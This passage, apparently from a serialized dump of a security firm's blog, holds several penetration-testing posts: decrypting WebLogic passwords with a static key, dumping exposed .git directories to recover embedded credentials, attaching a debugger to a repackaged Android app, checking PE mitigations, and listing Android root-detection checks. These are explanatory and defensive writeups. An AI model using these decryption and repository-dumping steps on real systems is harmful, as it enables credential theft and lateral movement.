    $CipherParameters = [Org.BouncyCastle.Security.PbeUtilities]::GenerateCipherParameters($EncryptionKeyCipher,$Pass,$AlgorithmParameters)

    $KeyCipher = [Org.BouncyCastle.Security.PbeUtilities]::CreateEngine($EncryptionKeyCipher)
    $KeyCipher.Init($false, $CipherParameters)

    $Key = $KeyCipher.DoFinal($EncryptionKey)

    $Cipher = [Org.BouncyCastle.Security.CipherUtilities]::GetCipher($EncryptionCipher)
    $KeyParameter = [Org.BouncyCastle.Crypto.Parameters.KeyParameter] $Key
    $ParametersWithIV = [Org.BouncyCastle.Crypto.Parameters.ParametersWithIV]::new($KeyParameter , $IV)

    $Cipher.Init($false, $ParametersWithIV)
    $ClearText = $Cipher.DoFinal($DecodedCipherText)

    [System.Text.Encoding]::ASCII.GetString($ClearText)
}

Export-ModuleMember -Function Invoke-WebLogicPasswordDecryptor

I also added the ability to decrypt 3DES for older versions of WebLogic. Here's the result:

PS C:\> Import-Module .\Invoke-WebLogicDecrypt.psm1
PS C:\> Invoke-WebLogicPasswordDecryptor -SerializedSystemIni "C:\SerializedSystemIni.dat" -CipherText "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="
Password: Password1

Speaking of 3DES, if you have a newer version of WebLogic that uses AES, you can change it back to 3DES by modifying the SerializedSystemIni.dat file. A newer one will have 02 set for the 6th byte:

[Screenshot: hex editor view of SerializedSystemIni.dat with the version byte set to 02]

This outputs the following in WLST:

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline> pw = encrypt('password')
wls:/offline> print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=

Changing it to 01 will enable 3DES:

[Screenshot: hex editor view of SerializedSystemIni.dat with the version byte set to 01]
root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline> pw = encrypt("Password1")
wls:/offline> print pw
{3DES}vNxF1kIDgtydLoj5offYBQ==

Conclusion

The penetration test revealed three big issues: the use of a static key for encryption, installing WebLogic on an SMB share, and allowing anonymous users read access to that share. The static key is something that users don't control. I downloaded several versions of WebLogic and the key is the same across all of them, so if you have access to a SerializedSystemIni.dat file and some encrypted passwords, it's possible to decrypt them all, Muahaha!!! This all depends on whether or not you have access to the WebLogic installation directory, which leads to the next issue: installing applications on a share. Installing any application on a share is risky in itself, but not securing that share can lead to catastrophic consequences. In the penetration test, after copying down the SerializedSystemIni.dat, I could decrypt all the encrypted passwords from my initial grep. These were local user passwords and Oracle database passwords: everything you need for lateral movement within an environment, all from anonymous access to a share.

[post_title] => Decrypting WebLogic Passwords [post_excerpt] => The following blog walks through part of a recent penetration test and the the decryption process for WebLogic passwords that came out of it. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => decrypting-weblogic-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:04 [post_modified_gmt] => 2021-06-08 21:46:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3125 [menu_order] => 684 [post_type] => post [post_mime_type] => [comment_count] => 12 [filter] => raw ) [8] => WP_Post Object ( [ID] => 2254 [post_author] => 7 [post_date] => 2015-02-02 07:00:19 [post_date_gmt] => 2015-02-02 07:00:19 [post_content] =>

Every so often when performing a penetration test against a web application or a range of external/internal servers, I come across publicly accessible .git directories. Git is a revision control tool that helps keep track of changes in files and folders and is used extensively in the web development community. This blog isn't going to be a tutorial on Git, so a basic understanding of how Git and revision control tools work will be helpful. One thing I do want to point out for people who are not familiar with Git is that every time Git is initialized in a directory, a local repository is created, and that repository contains all the commit information for every file. In this blog, I will be walking through ways in which a person can obtain information from a web server that has a publicly available .git directory. For people who know how to use Git, this blog may seem like a no-brainer; none of the information here is new or groundbreaking. Everything I will be showing is basic Git functionality. The reason I am writing this blog is to educate people on why having Git on your web server can be dangerous if the server is configured incorrectly.

Here we see a simple website. There are no links to anything, but that doesn't mean we can't find something.

[Screenshot: a simple website with no visible links]

The easiest way to check for a git repository is to search for the .git directory.

[Screenshot: browsing to the /.git/ directory listing]

This is a simple example, but it comes up quite often. Automated tools such as Nessus, Nikto, and nmap are pretty reliable for checking if this directory exists too.

We can see in the above screenshot that all the information for Git is there. Usually the first thing that I do is look at the config file. The config file contains information about the repository; this can include anything from the editor of choice to SMTP credentials. In this example, the Git repository only exists locally with hardly any functionality, which is why not much is there.

[Screenshot: contents of the .git/config file]

The next thing I'm going to do is pull down the entire .git directory along with all the files and folders within it. I use a recursive wget command to do this:

 wget -r https://192.168.37.128/.git/

We now have the Git repository from the web server!

root@kali:~/192.168.37.128: ls -al
total 12
drwxr-xr-x  3 root root 4096 Dec 26 14:28 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:28 .git
root@kali:~/192.168.37.128#

Doing a simple git status, we can view local changes compared with what was in the web server's repository.

root@kali:~/192.168.37.128: git status
# On branch master
# Changes not staged for commit:
#   (use "git add/rm <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#
#    deleted:    index.php
#
no changes added to commit (use "git add" and/or "git commit -a")

As you can see, we are missing an index.php file in our repository.

For small repositories with few files, we can simply diff the changes and view the contents of files that we do not have.

root@kali:~/192.168.37.128: git diff
diff --git a/index.php b/index.php
deleted file mode 100644
index 2bd0989..0000000
--- a/index.php
+++ /dev/null
@@ -1,13 +0,0 @@
-Hello World!
-
-<?php
-$servername = "localhost";
-$username = "admin";
-$password = "password";
-
-$conn = new mysqli($servername, $username, $password);
-
-if ($conn->connect_error) {
-    die("Connection failed: " . $conn->connect_error);
-} 
-?>

Here we can see the contents of the index.php file, which is making a connection to a local MySQL server with credentials embedded in it. Diffing is an easy way to view changes, but as repositories get larger, diffing becomes cumbersome because every file spits back information, and viewing everything can get annoying real fast.

An easier way to get the actual files back is to simply do a git reset --hard, which resets the repository back to the last commit. Remember, every Git repository contains all the information about every commit. So when we reset the repository to the last commit, Git repopulates the directory with every file that was there.

root@kali:~/192.168.37.128: git reset --hard
HEAD is now at ec53e64 hello world
root@kali:~/192.168.37.128: ls -al
total 16
drwxr-xr-x  3 root root 4096 Dec 26 14:37 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:37 .git
-rw-r--r--  1 root root  238 Dec 26 14:37 index.php
root@kali:~/192.168.37.128:

We can see that the index.php file was added back into our local repository for viewing.

Objects

Git stores file information within the objects folder.

root@kali:~/192.168.37.128/.git/objects: ls -al
total 64
drwxr-xr-x 16 root root 4096 Dec 26 14:28 .
drwxr-xr-x  8 root root 4096 Dec 26 14:37 ..
drwxr-xr-x  2 root root 4096 Dec 26 14:28 04
drwxr-xr-x  2 root root 4096 Dec 26 14:28 07
drwxr-xr-x  2 root root 4096 Dec 26 14:28 26
drwxr-xr-x  2 root root 4096 Dec 26 14:28 2b
drwxr-xr-x  2 root root 4096 Dec 26 14:28 83
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8d
drwxr-xr-x  2 root root 4096 Dec 26 14:28 8f
drwxr-xr-x  2 root root 4096 Dec 26 14:28 93
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ae
drwxr-xr-x  2 root root 4096 Dec 26 14:28 ec
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f2
drwxr-xr-x  2 root root 4096 Dec 26 14:28 f3
drwxr-xr-x  2 root root 4096 Dec 26 14:28 info
drwxr-xr-x  2 root root 4096 Dec 26 14:28 pack

There are two-character folders with random alphanumeric file names inside them.

root@kali:~/192.168.37.128/.git/objects/2b: ls -al
total 12
drwxr-xr-x  2 root root 4096 Dec 26 14:28 .
drwxr-xr-x 16 root root 4096 Dec 26 14:28 ..
-rw-r--r--  1 root root  171 Dec 26 13:32 d098976cb507fc498b5e8f5109607faa6cf645

The two-character folder name combined with the file name inside of it forms the SHA-1 hash of a blob of data. Between them, these objects contain bits and pieces of every file within the repository.
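
As a quick aside (my own illustration, not from the original post), the object name is just the SHA-1 of a small header plus the file contents, which you can reproduce in a few lines of Python:

import hashlib

def git_blob_sha1(content):
    # Git hashes "blob <size>\0" followed by the raw file bytes
    header = b"blob %d\x00" % len(content)
    return hashlib.sha1(header + content).hexdigest()

sha = git_blob_sha1(open("index.php", "rb").read())
print(sha[:2] + "/" + sha[2:])   # matches .git/objects/2b/d098...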

We can actually see the SHA-1 for index.php by using the following command:

git cat-file -p master^{tree}
root@kali:~/192.168.37.128/.git: git cat-file -p master^{tree}
100644 blob 2bd098976cb507fc498b5e8f5109607faa6cf645    index.php

What this does is print out the SHA-1 for each file within the master branch on the repository.

We can then take that SHA-1 and give it to git cat-file and print out the file contents:

root@kali:~/192.168.37.128/.git: git cat-file -p 2bd098976cb507fc498b5e8f5109607faa6cf645
Hello World!

<?php
$servername = "localhost";
$username = "admin";
$password = "password";

$conn = new mysqli($servername, $username, $password);

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
} 
?>

Branches

One other thing I like to do is see if there are any branches we can switch to that may contain other files. Running git branch will display the branches available and the current one that you are on (* indicates the current working branch).

root@kali:~/192.168.37.128: git branch
* master
  test

We can see that there is a test branch available. Let’s switch to the test branch and see if there is anything that is different between it and the master branch.

root@kali:~/192.168.37.128: git checkout test
Switched to branch 'test'
root@kali:~/192.168.37.128: ls -al
total 20
drwxr-xr-x  3 root root 4096 Dec 26 14:53 .
drwxr-xr-x 19 root root 4096 Dec 26 14:28 ..
drwxr-xr-x  8 root root 4096 Dec 26 14:53 .git
-rw-r--r--  1 root root  229 Dec 26 14:53 index.php
-rw-r--r--  1 root root   15 Dec 26 14:53 secret.txt

By switching to the test branch, we can see that there is an additional secret.txt file in the repository. Often times I see development branches that contain test credentials and debug information that haven't been removed.

Conclusion

This is by no means an exhaustive look at everything you can do with Git repositories, and I'm sure I'm missing some things that are causing Git aficionados to bang their heads in rage. If you are going to use Git on a live server, make sure that the .git directory is not being indexed and that the directory, its sub-directories, and all files are inaccessible via server permission rules. It is also a very good practice to not include any sensitive data in files that are added to Git; this can cause nightmares if that information is pushed to places like GitHub or Bitbucket for all the world to see. Furthermore, the .gitignore file should be used to ensure sensitive files are properly ignored and never mistakenly added.

[post_title] => Dumping Git Data from Misconfigured Web Servers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dumping-git-data-from-misconfigured-web-servers [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:44:11 [post_modified_gmt] => 2021-06-08 21:44:11 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2254 [menu_order] => 690 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [9] => WP_Post Object ( [ID] => 1982 [post_author] => 7 [post_date] => 2015-01-19 07:00:44 [post_date_gmt] => 2015-01-19 07:00:44 [post_content] =>

In this blog, I am going to walk through how we can attach a debugger to an Android application and step through method calls by using information gained from first decompiling it. The best part is, root privilege is not required. This can come in handy during mobile application penetration tests because we can step into an application while it’s running and potentially read and write information that we normally wouldn't have access to. Some examples include intercepting traffic before it is encrypted, obtaining encryption keys while they are being used, and obtaining passwords and other sensitive data even when they never touch the disk. This blog should be interesting to mobile penetration testers and developers who are trying to gain a better understanding of possible attacks on the Android platform.

Requirements

Below is a list of requirements for performing the attacks covered in this blog.

For this blog I will be using Windows 8, Android Studio, and IntelliJ IDEA. The device I am using is a stock Nexus 4 running Android 4.4.4. I recommend that all the tools be added to your PATH environment variable so they can be easily accessed.

For those of you who want to use the APK I am using in this blog, you can download it here:

com.netspi.egruber.test.apk

Setting up the Device

The instructions below walk through how to get your device ready for testing.

Enable Developer Options

The first thing we need to do is make sure our Android device has USB debugging enabled, so we can communicate with it using the Android SDK tools. To do this we need to enable the Developer options. If you are running a stock Android device, this can be done by navigating to Settings > About Phone and tapping on the Build Number multiple times. Eventually it should say that the Developer options have been enabled.


Enable USB Debugging

Next we access the Developer options by going to Settings > Developer options. Then we can enable USB debugging.


Plug-in Device via USB and Start ADB

After plugging the device into your computer, the device should say, "USB debugging connected". We also want to make sure that we can connect to the device with the Android Debug Bridge (ADB). This is software included within the Android SDK under platform-tools. By typing:

adb devices

in a shell our device should come up and look like this:

[Screenshot: adb devices output listing the connected device]

If your device does not come up, the most likely reason is because the correct driver has not been installed (on Windows). Depending on the manufacturer, this can be obtained from the Android SDK or the manufacturer website.

Determining Debuggability

When debugging Android applications, we first have to check whether or not the application is set to be debugged. We can check this in a few different ways.

The first way is to open the Android Device Monitor in the Android SDK under the tools directory. On Windows it will be called monitor.bat. When we open the Android Device Monitor, we can see our device listed in the Devices section.

[Screenshot: the Devices section of the Android Device Monitor]

If any application on the device is set as debuggable, then the application would show up here. I created a test application and we can see here that it is not set to be debuggable.

The second way we can check for debuggability is by looking at the AndroidManifest.xml file from the APK of the application. An APK is essentially a zip file of all the information our application needs to run on an Android device.

If you do not have the APK for your application, then we have to pull it off of the Android device. Whenever an application is downloaded from the Google Play Store, the APK of the application is downloaded and stored on the device. Downloaded APK files usually reside in /data/app on the device. If your device is not rooted, you will not be able to list the files in that directory. However, if you know the name of the APK, it can be pulled down using the adb tool. To find the name of the APK we want to pull down, open a shell and type:

adb shell

This will give us a shell on the device. Then type:

pm list packages -f

This will list all the packages on the device.

[Screenshot: pm list packages output]

Looking through the list we can find the application we want.


Next, we need to pull down the APK. To do this, open a shell and type the following command:

adb pull /data/app/[.apk file] [location]
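As a convenience (my own wrapper, not part of the post's toolchain), the lookup and pull can be scripted; pm path prints the APK location for a package, which we then hand to adb pull:

import subprocess

def pull_apk(package, dest="."):
    # 'pm path <package>' prints a line like 'package:/data/app/<pkg>.apk'
    out = subprocess.run(["adb", "shell", "pm", "path", package],
                         capture_output=True, text=True, check=True).stdout.strip()
    apk_path = out.replace("package:", "")
    subprocess.run(["adb", "pull", apk_path, dest], check=True)

pull_apk("com.netspi.egruber.test")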

Now that we have our APK, we want to open it and look at the AndroidManifest.xml file. Unfortunately, we can’t just unzip the APK and view the XML file; it is binary encoded and must be decoded. The most popular tool to do this is apktool. However, I have been using the tool APK Studio recently because it has a nice GUI which is easy to navigate. For the rest of the blog I will be using APK Studio.

To begin using APK Studio, select the little green android icon. Give your project a name and select the APK for APK Path. Then, give a location that everything should be saved to.


After opening the APK, select the AndroidManifest.xml file and look at the application node. If there is no flag that says android:debuggable, then the APK is not debuggable. If there is a flag that says android:debuggable="false", then the APK is also not debuggable.


Modifying the AndroidManifest.xml to Enable Debugging

The nice thing about apktool and APK Studio is that we can edit any of the decompiled Android files and recompile them. That’s what we’re going to do here. We are going to make the application debuggable by adding in the android:debuggable flag. Edit the AndroidManifest.xml so that the application node contains android:debuggable="true".


After we have added that flag, rebuild the APK by selecting the hammer icon in the menu. Our rebuilt APK file should be located in the build/apk  directory.


Rebuilding the application will also sign it so that it can be installed back on the device. All Android applications have to be signed. Most applications don’t check whether they were signed with the original certificate. If your application does check, then this may not work unless the portion of code that performs the check is edited as well.

Next we need to install our newly rebuilt APK. First, uninstall the application on the device. This can be done from the command line using adb:

adb uninstall [package name]

Then install using:

adb install [.apk file]

You can also uninstall and reinstall the APK with the following command:

adb install -r [.apk file]

Check and make sure that the reinstalled application runs correctly on the Android device. If everything is working, go back to the Android Device Monitor and our application should now appear under the Devices section.


Setting up the IDE

Now that our application is marked as debuggable, we can attach a debugger to it. But before we do that, we need to set up our IDE for the application we want to debug. For this blog, I am using IntelliJ IDEA. To begin, I am going to create a new Android project. The application name can be anything, but the package name has to be the same as the APK package structure.


This can be as easy as the name of the APK. However, if you are still not sure, you can look at APK Studio and follow the package structure to where the application files are located. For my application, the package structure is the name of the APK, "com.netspi.egruber.test". This can also be seen in APK Studio.


Uncheck the "Create Hello World Activity" checkbox and finish creating the project by selecting the default values. After that is done, your project layout should now look like this:

[Screenshot: the new project layout in IntelliJ]

Now that we have our project created, we need to populate it with the source code from the Android APK. The reason we need to do this is so the debugger knows the names of the symbols, methods, variables, etc. for the application. The nice thing about Android applications is that they can be decompiled rather easily back to mostly correct Java source code. We need to do this and import all of it into our project in the IDE.

Dumping the APK and Decompiling to Source

The first thing we need to do to get the source code back from the Android application is to convert the APK file to a jar file. We can then use a java decompiler to retrieve the java source code. To do this, we are going to use the tool dex2jar. Dex2jar contains the bat file d2j-dex2jar that can be used to convert an APK to a jar file. The syntax is simple:

d2j-dex2jar.bat [.apk file]

You should now have a jar file of the APK. Next we are going to use the Java decompiler JD-GUI to open the jar file. Simply open the jar file or drag it into the workspace of JD-GUI.


You should now see the package structure of the jar file. Inside all of the packages should be java files complete with readable source code. What we’re going to do now is save all of the source code to a zip file by selecting File > Save All Sources.


After the source has been saved, unzip it into its own directory.


Now we need to import these two directories into our Android project in our IDE. For IntelliJ, navigate to the src folder of your project and paste the two directories in there.


If we go back to the project in Intellij, the project structure should update.


Clicking on one of the imported activities should show the source code. As you can see from the screenshot, the source code I imported is obfuscated using ProGuard.


Attaching the Debugger

Now that we have our project populated with source code of the application, we can then start setting breakpoints on method calls and variables to pause the execution of the process when those are reached. In this example I am setting a breakpoint on a method when someone enters a value into a text box. This does work with obfuscated code.


After the breakpoint has been set, attach the debugger to the application process on the Android device by selecting the little screen icon in the upper right hand corner. This may be different depending on your IDE.


Next you will be prompted to choose a process on the device. Only debuggable processes will appear.


After selecting the debuggable process, the debugger will connect to the device.


In my test application, I will enter the number “42” into the text box that we have a breakpoint set for.


After selecting "Enter Code", the process pauses execution at the breakpoint. This works because the debugger knows what is being called on the device. The compiled Android application contains debug information, such as variable names, that is accessible to any debugger that understands the Java Debug Wire Protocol (JDWP). If an Android application allows debugging, a JDWP-compatible debugger, such as the one in most Java IDEs, can connect to the virtual machine of the Android application and read and execute debug commands.


We can see that value that we entered into the application under the variables section.


Conclusion

From here we can not only read data from the application, but also insert our own. This can be useful if we wanted to interrupt the flow of the program and possibly bypass application logic. By debugging, we can get a better understanding of how Android applications perform certain actions that we would otherwise be unable to see. This can come in handy especially when we need to view how encryption functions are being used and the values of dynamic keys. It is also helpful when debugging functions that interact with the filesystem or a database to see when and how information is being saved. Without the need of root privileges, we have the capability to perform these types of tests on any Android device.

[post_title] => Attacking Android Applications With Debuggers [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-android-applications-with-debuggers [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:33:57 [post_modified_gmt] => 2023-03-16 14:33:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1982 [menu_order] => 693 [post_type] => post [post_mime_type] => [comment_count] => 19 [filter] => raw ) [10] => WP_Post Object ( [ID] => 1114 [post_author] => 7 [post_date] => 2014-06-23 07:00:20 [post_date_gmt] => 2014-06-23 07:00:20 [post_content] =>

Update: This post is a little bit out-of-date in regards to using the PowerShell script. Refer to the Github repo (https://github.com/NetSPI/PEchecker) for an updated script and instructions on how to use it.

Today I am releasing a PowerShell script that easily displays whether images (DLLs and EXEs) are compiled with ASLR (Address Space Layout Randomization), DEP (Data Execution Prevention), and SafeSEH (Structured Exception Handling). It is located at the github repo here: https://github.com/NetSPI/PEchecker. Without going into much detail, ASLR, DEP, and SafeSEH are considered best practices for all developers to implement, as they help protect against the exploitation of insecure code. As a side note, SafeSEH is only available when linking 32bit images.

There are a few solutions out there that do this already, namely PEStudio, CFFExplorer, Windbg with plugins, and Immunity Debugger with mona.py. However, I find that each of these is inefficient for scanning multiple files. PowerShell is a great solution for this because it is a native tool that can tap into the Windows API and carve information out of files.

What I’m interested in are the PE (Portable Executable) headers within compiled 32bit and 64bit images. In simplistic terms, PE headers contain all the information needed by Windows to run compiled images. Within the PE headers there is an Optional Header that contains the DLLCharacteristics member. The DLLCharacteristics member is a hex value that describes the compiled options of a file. It is set to the additive hex values contained in the following table:

Value                                                    Meaning
0x0001                                                   Reserved.
0x0002                                                   Reserved.
0x0004                                                   Reserved.
0x0008                                                   Reserved.
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (0x0040)           The DLL can be relocated at load time.
IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY (0x0080)        Code integrity checks are forced. If you set this flag and a section contains only uninitialized data, set the PointerToRawData member of IMAGE_SECTION_HEADER for that section to zero; otherwise, the image will fail to load because the digital signature cannot be verified.
IMAGE_DLLCHARACTERISTICS_NX_COMPAT (0x0100)              The image is compatible with data execution prevention (DEP).
IMAGE_DLLCHARACTERISTICS_NO_ISOLATION (0x0200)           The image is isolation aware, but should not be isolated.
IMAGE_DLLCHARACTERISTICS_NO_SEH (0x0400)                 The image does not use structured exception handling (SEH). No handlers can be called in this image.
IMAGE_DLLCHARACTERISTICS_NO_BIND (0x0800)                Do not bind the image.
0x1000                                                   Reserved.
IMAGE_DLLCHARACTERISTICS_WDM_DRIVER (0x2000)             A WDM driver.
0x4000                                                   Reserved.
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE (0x8000)  The image is terminal server aware.

This table is from Microsoft and is located here (https://msdn.microsoft.com/en-us/library/windows/desktop/ms680339(v=vs.85).aspx). You can see in the table that there are values pertaining to the status of ASLR (IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE), DEP (IMAGE_DLLCHARACTERISTICS_NX_COMPAT), and SEH (IMAGE_DLLCHARACTERISTICS_NO_SEH) for a compiled image. Common DLLCharacteristics values are 0x0140 for ASLR and DEP with SEH in use, and 0x0400 for no ASLR, no DEP, and no SEH. If IMAGE_DLLCHARACTERISTICS_NO_SEH is set, then there is no SEH and SafeSEH is not needed.

As stated before, SafeSEH is only available for 32bit images, and it can only be used if every linked module supports it. To verify SafeSEH we need to look at the SafeSEH fields, which reside in the IMAGE_LOAD_CONFIG_DIRECTORY section of a PE. Within this structure are the SEHandlerTable, which holds the virtual address of a table of relative virtual addresses for each valid handler, and the SEHandlerCount, which is the number of handlers in the valid handler table. If SafeSEH is not used, these members, and sometimes the IMAGE_LOAD_CONFIG_DIRECTORY section itself, will be empty.
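
As a cross-check (my own illustration; the post's script is PowerShell, but the third-party Python module pefile exposes the same header field):

import pefile

DYNAMIC_BASE = 0x0040   # ASLR
NX_COMPAT    = 0x0100   # DEP
NO_SEH       = 0x0400   # image uses no SEH at all

def check_mitigations(path):
    pe = pefile.PE(path, fast_load=True)
    chars = pe.OPTIONAL_HEADER.DllCharacteristics
    return {"ASLR": bool(chars & DYNAMIC_BASE),
            "DEP": bool(chars & NX_COMPAT),
            "NoSEH": bool(chars & NO_SEH)}

print(check_mitigations(r"C:\Windows\System32\kernel32.dll"))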

Automation

Note: The name of the script has been changed to Check-PESecurity.ps1. All of the flags still work correctly.

The PEchecker PowerShell script utilizes C# code to create the relevant structs needed for the PE header format. A big thank you to the PowerSploit project (https://github.com/mattifestation/PowerSploit) and the Get-PEHeader script for providing a lot of insight into doing this. PEchecker provides a lot of functionality. To begin, I will show how to look at a single file, using the command:

Get-PESecurity -file "filename"

We can see a list view of the current file with the filename, architecture, and whether it is compiled with ASLR, DEP, and SafeSEH. We can turn this into a table in PowerShell by piping the output to the format-table function. Next, we can use the directory switch to scan an entire directory for DLLs and EXEs.

Get-PESecurity -directory "directory"

The directory switch also supports recursing through subdirectories. To do this, simply add the recursive switch:

Get-PESecurity -directory "directory" -recursive

I also added in support for filtering files based on ASLR, DEP, and SafeSEH. To do this, use the following switches:

-OnlyNoASLR
-OnlyNoDEP
-OnlyNoSafeSEH

A great piece of functionality in PowerShell is being able to export CSV files from our results. To do this, run the following command:

Get-PESecurity -directory "directory" -recursive | Export-Csv output.csv


[post_title] => Verifying ASLR, DEP, and SafeSEH with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => verifying-aslr-dep-and-safeseh-with-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:56:33 [post_modified_gmt] => 2021-06-08 21:56:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1114 [menu_order] => 711 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [11] => WP_Post Object ( [ID] => 1137 [post_author] => 7 [post_date] => 2013-12-02 07:00:55 [post_date_gmt] => 2013-12-02 07:00:55 [post_content] =>

Introduction

I have taken a look at a lot of Mobile Device Management (MDM) solutions lately to figure out how they detect rooted Android devices. Through some research, I have discovered that many of these MDM solutions use similar methods: looking for specific packages and files, checking directory permissions, and running certain commands. I won't be disclosing which MDMs use which methods, but I will provide a list of packages, files, folders, and commands that I have found to be used in root detection. All of the commands below were run on a stock, rooted Nexus 4 running Android 4.2.2.

Default Files & Configurations

The first root detection checks are for default files and configurations that should be present on a non-rooted device. These may also be present on rooted devices running non-custom ROMs.
  1. Checking the BUILD tag for test-keys. By default, stock Android ROMs from Google are built with release-keys tags. If test-keys are present, this can mean that the Android build on the device is either a developer build or an unofficial Google build. My Nexus 4 is running stock Android from Google's Android Open Source Project (AOSP), which is why my build tags show release-keys.
    root@android:/ # cat /system/build.prop | grep ro.build.tags
    ro.build.tags=release-keys
  2. Checking for Over The Air (OTA) certs. By default, Android is updated OTA using public certs from Google. If the certs are not there, it usually means a custom ROM is installed that is updated through other means. My Nexus 4 has no custom ROM and is updated through Google. Updating my device, however, will probably break root.
    root@android:/ # ls -l /etc/security/otacerts.zip
    ls -l /etc/security/otacerts.zip
    -rw-r--r-- root     root         1733 2008-08-01 07:00 otacerts.zip

Installed Files & Packages

There are many files and packages that MDMs look for when detecting if a device is rooted. I have compiled a list of ones that I know for sure are being detected.
  1. Superuser.apk. This package is most often looked for on rooted devices. Superuser allows the user to authorize applications to run as root on the device.
  2. Other packages. The following packages are often looked for as well. The last two facilitate temporarily hiding the su binary and disabling installed applications.
    com.noshufou.android.su
    com.thirdparty.superuser
    eu.chainfire.supersu
    com.koushikdutta.superuser
    com.zachspong.temprootremovejb
    com.ramdroid.appquarantine
  3. The following command lists packages that are currently installed on your device.
    root@android:/ # pm list packages
    package:com.android.backupconfirm
    package:com.android.bluetooth
    package:com.android.browser.provider
    package:com.android.calculator2
    package:eu.chainfire.supersu
  4. Any Chainfire package. One MDM looks for any package developed by Chainfire, the most notable being SuperSU.
  5. Cyanogenmod.superuser. If the CyanogenMod ROM is installed, the cyanogenmod.superuser activity may be in the com.android.settings package. This can be detected by listing the activities within com.android.settings.
  6. Su binaries. The following su binaries are often looked for on rooted devices; a quick combined check is sketched after this list.
    /system/bin/su
    /system/xbin/su
    /sbin/su
    /system/su
    /system/bin/.ext/.su
    /system/usr/we-need-root/su-backup
    /system/xbin/mu
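
Putting several of these checks together, here is a rough sketch that can be run from a shell on the device. The paths and package names are the ones listed above; the availability of grep is assumed, as in the earlier examples:

    # look for common su binary locations
    for f in /system/bin/su /system/xbin/su /sbin/su /system/su /system/bin/.ext/.su /system/usr/we-need-root/su-backup /system/xbin/mu; do
      [ -e "$f" ] && echo "su binary found: $f"
    done
    # look for superuser and root-hiding packages
    pm list packages | grep -E 'superuser|supersu|temprootremovejb|appquarantine'
    # check the build tags
    grep ro.build.tags /system/build.prop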

Directory Permissions

Sometimes when a device has been rooted, the permissions are changed on common directories. I have never seen this personally, but it is being checked for.
  1. Are the following directories writable? (See the sketch after this list for a quick way to test.)
    /data
    /
    /system
    /system/bin
    /system/sbin
    /system/xbin
    /vendor/bin
    /sys
    /sbin
    /etc
    /proc
    /dev
  2. Can we read files in /data? The /data directory contains all of the installed application files. By default, /data is not readable.
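
Both checks can be tested with something like the following sketch. Run it as the unprivileged shell user rather than as root, since root can read and write almost anything:

    # test the directories from the list above for write access
    for d in /data / /system /system/bin /system/sbin /system/xbin /vendor/bin /sys /sbin /etc /proc /dev; do
      [ -w "$d" ] && echo "writable: $d"
    done
    # test read access to /data
    ls /data >/dev/null 2>&1 && echo "/data is readable"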

Commands

A few MDMs execute common commands to detect if a device is rooted.
  1. Su. Execute su and then id to check whether the current user has a uid of 0 or whether the output contains (root).
    shell@android:/ $ su
    shell@android:/ # id
    uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),1028(sdcard_r)
  2. Busybox. If a device has been rooted, more often than not Busybox has been installed as well. Busybox is a single binary that provides many common Linux commands, and being able to run it successfully is a good indication that a device has been rooted.
    root@android:/ # busybox df
    Filesystem           1K-blocks      Used Available Use% Mounted on
    tmpfs                   958500        32    958468   0% /dev
    tmpfs                   958500         0    958500   0% /mnt/secure
    tmpfs                   958500         0    958500   0% /mnt/asec
    tmpfs                   958500         0    958500   0% /mnt/obb

Conclusion

This is probably nowhere near a complete list, but it does show the many different ways root can be detected on Android devices. Blacklisting packages and binaries seems to be the simplest and most effective way to detect root. This is especially true if your device is running a stock Google ROM that has been rooted, like mine, where the only difference is the addition of su and a couple of packages. At some point in the future I would like to create an app that will run all of these checks before installing an MDM. I touch on bypassing AirWatch root detection in my blog here: https://www.netspi.com/blog/entryid/192/bypassing-airwatch-root-restriction; however, AirWatch has made some changes, so it may not work anymore depending on your environment. [post_title] => Android Root Detection Techniques [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => android-root-detection-techniques [to_ping] => [pinged] => [post_modified] => 2021-06-09 23:19:05 [post_modified_gmt] => 2021-06-09 23:19:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1137 [menu_order] => 730 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [12] => WP_Post Object ( [ID] => 